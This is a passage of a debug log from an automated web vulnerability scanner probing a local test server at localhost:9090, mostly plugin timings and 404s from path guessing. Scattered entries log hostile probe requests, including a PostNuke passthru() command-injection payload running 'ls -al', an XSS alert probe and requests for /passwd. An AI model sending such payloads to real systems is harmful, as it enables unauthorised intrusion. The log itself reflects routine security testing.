strange_reason.grep(uri="http://localhost:9090/uk/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/uk/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/uk/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] cache_control.grep(uri="http://localhost:9090/uk/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] strange_headers.grep(uri="http://localhost:9090/uk/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] ssn.grep(uri="http://localhost:9090/uk/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] oracle.grep(uri="http://localhost:9090/uk/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] feeds.grep(uri="http://localhost:9090/uk/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2245. [Wed Feb 12 10:04:31 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/uk/") took 0.03s to run [Wed Feb 12 10:04:31 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2246. [Wed Feb 12 10:04:31 2020 - debug] symfony.grep(uri="http://localhost:9090/show/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2247. [Wed Feb 12 10:04:31 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4534. [Wed Feb 12 10:04:31 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/show/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/accounting/ returned HTTP code "404" (id=23796,from_cache=0,grep=1,rtt=0.02,did=uB4hq6id) [Wed Feb 12 10:04:31 2020 - debug] GET http://localhost:9090/eventum/forgot_password.php?email=\\"> returned HTTP code "404" (id=23797,from_cache=0,grep=1,rtt=0.19,did=LAaJCbyd) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/downloads/ returned HTTP code "404" (id=23798,from_cache=0,grep=1,rtt=0.32,did=OZFwNFUv) [Wed Feb 12 10:04:31 2020 - debug] file_upload.grep(uri="http://localhost:9090/show/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/show/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2248. [Wed Feb 12 10:04:31 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2249. [Wed Feb 12 10:04:31 2020 - debug] svn_users.grep(uri="http://localhost:9090/show/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/show/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] private_ip.grep(uri="http://localhost:9090/show/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] motw.grep(uri="http://localhost:9090/show/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] meta_generator.grep(uri="http://localhost:9090/show/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] retirejs.grep(uri="http://localhost:9090/show/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/show/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 10:04:31 2020 - debug] serialized_object.grep(uri="http://localhost:9090/show/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] blank_body.grep(uri="http://localhost:9090/show/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/show/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/show/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] credit_cards.grep(uri="http://localhost:9090/show/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] websockets_links.grep(uri="http://localhost:9090/show/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] csp.grep(uri="http://localhost:9090/show/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] dom_xss.grep(uri="http://localhost:9090/show/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] vulners_db.grep(uri="http://localhost:9090/show/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/show/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] keys.grep(uri="http://localhost:9090/show/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] expect_ct.grep(uri="http://localhost:9090/show/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] clamav.grep(uri="http://localhost:9090/show/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 4534. [Wed Feb 12 10:04:31 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2250. [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/readme.txt returned HTTP code "404" (id=23799,from_cache=0,grep=1,rtt=0.03,did=DCANrGDQ) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/porn/ returned HTTP code "404" (id=23805,from_cache=0,grep=1,rtt=0.04,did=8bf1dgy6) [Wed Feb 12 10:04:31 2020 - debug] GET http://localhost:9090/secured/ returned HTTP code "404" (id=23807,from_cache=0,grep=1,rtt=0.14,did=lobgJbkR) [Wed Feb 12 10:04:31 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=23808,from_cache=0,grep=1,rtt=0.04,did=Phxqmou8) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/linux/ returned HTTP code "404" (id=23809,from_cache=0,grep=1,rtt=0.06,did=FF09fbw9) [Wed Feb 12 10:04:31 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 12316, 'reject-seen-url': 5700, 'reject-out-of-scope': 216, 'accept': 4943} [Wed Feb 12 10:04:31 2020 - debug] url_session.grep(uri="http://localhost:9090/show/") took 0.09s to run [Wed Feb 12 10:04:31 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/show/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] objects.grep(uri="http://localhost:9090/show/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] error_500.grep(uri="http://localhost:9090/show/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] meta_tags.grep(uri="http://localhost:9090/show/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] password_profiling.grep(uri="http://localhost:9090/show/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] click_jacking.grep(uri="http://localhost:9090/show/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/show/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] lang.grep(uri="http://localhost:9090/show/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2251. [Wed Feb 12 10:04:31 2020 - debug] GET http://localhost:9090/software/ returned HTTP code "404" (id=23800,from_cache=0,grep=1,rtt=0.08,did=wclGhtnv) [Wed Feb 12 10:04:31 2020 - debug] GET http://localhost:9090/postnuke/html/viewtopic.php?t=2&rush=dir&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 returned HTTP code "404" (id=23802,from_cache=0,grep=1,rtt=0.04,did=ZabG0WEQ) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/photo/ returned HTTP code "404" (id=23801,from_cache=0,grep=1,rtt=0.07,did=lDF6HLg7) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/passwd returned HTTP code "404" (id=23806,from_cache=0,grep=1,rtt=0.10,did=Z7HWsF1q) [Wed Feb 12 10:04:31 2020 - debug] GET http://localhost:9090/customers/ returned HTTP code "404" (id=23810,from_cache=0,grep=1,rtt=0.08,did=JmiCBAs4) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/exe/ returned HTTP code "404" (id=23811,from_cache=0,grep=1,rtt=0.07,did=hakEgQmO) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/people.list returned HTTP code "404" (id=23812,from_cache=0,grep=1,rtt=0.08,did=OsONmVvv) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/applicattion/ returned HTTP code "404" (id=23815,from_cache=0,grep=1,rtt=0.03,did=i4vUbS3w) [Wed Feb 12 10:04:31 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/show/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/bank/ returned HTTP code "404" (id=23817,from_cache=0,grep=1,rtt=0.03,did=vc7gfmhY) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/hyperstat/stat_what.log returned HTTP code "404" (id=23818,from_cache=0,grep=1,rtt=0.12,did=7zm87RNp) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/cgi-bin/GW5/GWWEB.EXE returned HTTP code "404" (id=23819,from_cache=0,grep=1,rtt=0.09,did=zbxIMwSg) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/netscape/ returned HTTP code "404" (id=23820,from_cache=0,grep=1,rtt=0.11,did=FNa3NpQ1) [Wed Feb 12 10:04:31 2020 - debug] GET http://localhost:9090/msadc/msadcs.dll returned HTTP code "404" (id=23821,from_cache=0,grep=1,rtt=0.05,did=yTqA5D6y) [Wed Feb 12 10:04:31 2020 - debug] GET http://localhost:9090/viewtopic.php?t=2&rush=ls -al&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 returned HTTP code "404" (id=23822,from_cache=0,grep=1,rtt=0.08,did=12ZW205W) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/logfiles/ returned HTTP code "404" (id=23804,from_cache=0,grep=1,rtt=0.03,did=VhMf8O5w) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/demos/ returned HTTP code "404" (id=23823,from_cache=0,grep=1,rtt=0.05,did=UQhIW5Md) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/invitados/ returned HTTP code "404" (id=23814,from_cache=0,grep=1,rtt=0.07,did=OLfjAxnM) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/incoming/ returned HTTP code "404" (id=23813,from_cache=0,grep=1,rtt=0.02,did=M6SNjbGK) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/c/ returned HTTP code "404" (id=23816,from_cache=0,grep=1,rtt=0.09,did=g3NjWUnA) [Wed Feb 12 10:04:31 2020 - debug] error_pages.grep(uri="http://localhost:9090/show/") took 0.07s to run [Wed Feb 12 10:04:31 2020 - debug] strange_reason.grep(uri="http://localhost:9090/show/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/show/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/show/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] cache_control.grep(uri="http://localhost:9090/show/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] strange_headers.grep(uri="http://localhost:9090/show/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] ssn.grep(uri="http://localhost:9090/show/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] oracle.grep(uri="http://localhost:9090/show/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] feeds.grep(uri="http://localhost:9090/show/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2252. [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/publica/ returned HTTP code "404" (id=23824,from_cache=0,grep=1,rtt=0.11,did=p8qHPYBD) [Wed Feb 12 10:04:31 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2253. [Wed Feb 12 10:04:31 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4534. [Wed Feb 12 10:04:31 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 10:04:31 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/show/") took 0.12s to run [Wed Feb 12 10:04:31 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 10:04:31 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2254. [Wed Feb 12 10:04:31 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2255. [Wed Feb 12 10:04:31 2020 - debug] localhost:9090 connection pool stats (free:200 / in_use:2 / max:50 / total:202) [Wed Feb 12 10:04:31 2020 - debug] Connections with more in use time: (288ccd1fb05c7874, 0.06 sec) (b2a835d876a3d80d, 0.02 sec) [Wed Feb 12 10:04:31 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2256. [Wed Feb 12 10:04:31 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2257. [Wed Feb 12 10:04:31 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2258. [Wed Feb 12 10:04:31 2020 - debug] symfony.grep(uri="http://localhost:9090/xml/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/xml/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] motw.grep(uri="http://localhost:9090/xml/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] meta_generator.grep(uri="http://localhost:9090/xml/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] retirejs.grep(uri="http://localhost:9090/xml/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/xml/") took 0.01s to run [Wed Feb 12 10:04:31 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/xml/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] private_ip.grep(uri="http://localhost:9090/xml/") took 0.03s to run [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/cliente/ returned HTTP code "404" (id=23825,from_cache=0,grep=1,rtt=0.07,did=ZaKt7Yx6) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/mkstats/ returned HTTP code "404" (id=23828,from_cache=0,grep=1,rtt=0.05,did=oqTbI2Le) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/samples/ returned HTTP code "404" (id=23830,from_cache=0,grep=1,rtt=0.04,did=X9iinFNS) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/cgi-bin/windmail returned HTTP code "404" (id=23831,from_cache=0,grep=1,rtt=0.05,did=DRukmnKo) [Wed Feb 12 10:04:31 2020 - debug] svn_users.grep(uri="http://localhost:9090/xml/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] expect_ct.grep(uri="http://localhost:9090/xml/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] file_upload.grep(uri="http://localhost:9090/xml/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/xml/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/staff/ returned HTTP code "404" (id=23834,from_cache=0,grep=1,rtt=0.12,did=kMgxm3Dp) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/Asp/ returned HTTP code "404" (id=23836,from_cache=0,grep=1,rtt=0.28,did=FlJoLHz6) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/cert/ returned HTTP code "404" (id=23837,from_cache=0,grep=1,rtt=0.13,did=IMmYnSqk) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/Stats/ returned HTTP code "404" (id=23838,from_cache=0,grep=1,rtt=0.04,did=LeBOedYx) [Wed Feb 12 10:04:31 2020 - debug] GET http://localhost:9090/administrator/ returned HTTP code "404" (id=23839,from_cache=0,grep=1,rtt=0.12,did=jCAkeoRe) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/activex/ returned HTTP code "404" (id=23840,from_cache=0,grep=1,rtt=0.06,did=6Kl2gJ1C) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/order/ returned HTTP code "404" (id=23841,from_cache=0,grep=1,rtt=0.08,did=8NCrMjJT) [Wed Feb 12 10:04:31 2020 - debug] GET http://localhost:9090/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 returned HTTP code "302" (id=23843,from_cache=0,grep=1,rtt=0.14,did=SW5JKZTu) [Wed Feb 12 10:04:31 2020 - debug] GET http://localhost:9090/iisadmpwd/aexp2.htr returned HTTP code "404" (id=23827,from_cache=0,grep=1,rtt=0.16,did=e4elJcK9) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/easylog/easylog.html returned HTTP code "404" (id=23829,from_cache=0,grep=1,rtt=0.04,did=Drx8mQ6z) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/support/ returned HTTP code "404" (id=23844,from_cache=0,grep=1,rtt=0.12,did=DHObuZYG) [Wed Feb 12 10:04:31 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 10:04:31 2020 - debug] serialized_object.grep(uri="http://localhost:9090/xml/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] blank_body.grep(uri="http://localhost:9090/xml/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/xml/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/xml/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] credit_cards.grep(uri="http://localhost:9090/xml/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] websockets_links.grep(uri="http://localhost:9090/xml/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] csp.grep(uri="http://localhost:9090/xml/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] dom_xss.grep(uri="http://localhost:9090/xml/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] vulners_db.grep(uri="http://localhost:9090/xml/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/xml/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] keys.grep(uri="http://localhost:9090/xml/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] clamav.grep(uri="http://localhost:9090/xml/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/cgi-bin/helpdesk.cgi returned HTTP code "404" (id=23832,from_cache=0,grep=1,rtt=0.09,did=Usm7vG81) [Wed Feb 12 10:04:31 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=23842,from_cache=0,grep=1,rtt=0.05,did=ttecO7iI) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/buddy.blt returned HTTP code "404" (id=23833,from_cache=0,grep=1,rtt=0.09,did=l81uyRez) [Wed Feb 12 10:04:31 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/xml/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] objects.grep(uri="http://localhost:9090/xml/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] error_500.grep(uri="http://localhost:9090/xml/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] meta_tags.grep(uri="http://localhost:9090/xml/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] password_profiling.grep(uri="http://localhost:9090/xml/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] click_jacking.grep(uri="http://localhost:9090/xml/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/xml/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] lang.grep(uri="http://localhost:9090/xml/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/hitmatic/analyse.cgi returned HTTP code "404" (id=23826,from_cache=0,grep=1,rtt=0.07,did=kQ3DyGB5) [Wed Feb 12 10:04:31 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2259. [Wed Feb 12 10:04:31 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 12326, 'reject-seen-url': 5714, 'reject-out-of-scope': 216, 'accept': 4944} [Wed Feb 12 10:04:31 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 12326, 'reject-seen-url': 5714, 'reject-out-of-scope': 216, 'accept': 4944} [Wed Feb 12 10:04:31 2020 - debug] GET http://localhost:9090/shopdisplayproducts.asp?id=1&cat= returned HTTP code "404" (id=23845,from_cache=0,grep=1,rtt=0.06,did=6g33vqNL) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/pr0n/ returned HTTP code "404" (id=23848,from_cache=0,grep=1,rtt=0.16,did=Vk4fkx1S) [Wed Feb 12 10:04:31 2020 - debug] localhost:9090 connection pool stats (free:193 / in_use:11 / max:50 / total:204) [Wed Feb 12 10:04:31 2020 - debug] Connections with more in use time: (b96c55c7f6e0b8ca, 0.13 sec) (1c563bdd844fe5f7, 0.12 sec) (35682d665bbb0240, 0.07 sec) (65725fb0e8cc2931, 0.07 sec) (6ca3bb5d7342ac33, 0.07 sec) [Wed Feb 12 10:04:31 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 10:04:31 2020 - debug] url_session.grep(uri="http://localhost:9090/xml/") took 0.10s to run [Wed Feb 12 10:04:31 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/xml/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] strange_reason.grep(uri="http://localhost:9090/xml/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/xml/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/xml/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] cache_control.grep(uri="http://localhost:9090/xml/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] strange_headers.grep(uri="http://localhost:9090/xml/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] ssn.grep(uri="http://localhost:9090/xml/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] oracle.grep(uri="http://localhost:9090/xml/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] feeds.grep(uri="http://localhost:9090/xml/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] error_pages.grep(uri="http://localhost:9090/xml/") took 0.01s to run [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/register/ returned HTTP code "302" (id=23846,from_cache=0,grep=1,rtt=0.10,did=sgscP0c0) [Wed Feb 12 10:04:31 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 10:04:31 2020 - debug] GET http://localhost:9090/forum/index.php?method=<=<=&script=>=>=&alert(\'Vulnerable\')=&/script= returned HTTP code "404" (id=23835,from_cache=0,grep=1,rtt=0.13,did=H3GCLLW1) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/connect/ returned HTTP code "404" (id=23847,from_cache=0,grep=1,rtt=0.12,did=lyPiW2oE) [Wed Feb 12 10:04:31 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2260. [Wed Feb 12 10:04:31 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/xml/") took 0.04s to run [Wed Feb 12 10:04:31 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 4534. [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/ibill/ returned HTTP code "404" (id=23849,from_cache=0,grep=1,rtt=0.09,did=Hc16n5PB) [Wed Feb 12 10:04:31 2020 - debug] symfony.grep(uri="http://localhost:9090/5/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/5/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] file_upload.grep(uri="http://localhost:9090/5/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] expect_ct.grep(uri="http://localhost:9090/5/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] svn_users.grep(uri="http://localhost:9090/5/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/5/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] private_ip.grep(uri="http://localhost:9090/5/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] motw.grep(uri="http://localhost:9090/5/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] meta_generator.grep(uri="http://localhost:9090/5/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] retirejs.grep(uri="http://localhost:9090/5/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/5/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/5/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 10:04:31 2020 - debug] serialized_object.grep(uri="http://localhost:9090/5/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] blank_body.grep(uri="http://localhost:9090/5/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/5/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/5/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] credit_cards.grep(uri="http://localhost:9090/5/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] websockets_links.grep(uri="http://localhost:9090/5/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] csp.grep(uri="http://localhost:9090/5/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] dom_xss.grep(uri="http://localhost:9090/5/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 4533. [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/cache-stats/ returned HTTP code "404" (id=23850,from_cache=0,grep=1,rtt=0.14,did=9OrAi4Ef) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/new returned HTTP code "404" (id=23851,from_cache=0,grep=1,rtt=0.10,did=dZylLmUo) [Wed Feb 12 10:04:31 2020 - debug] vulners_db.grep(uri="http://localhost:9090/5/") took 0.04s to run [Wed Feb 12 10:04:31 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/5/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] keys.grep(uri="http://localhost:9090/5/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2261. [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/transito/ returned HTTP code "404" (id=23852,from_cache=0,grep=1,rtt=0.01,did=Asi2MtFD) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/photodata/ returned HTTP code "404" (id=23853,from_cache=0,grep=1,rtt=0.13,did=70zbdBht) [Wed Feb 12 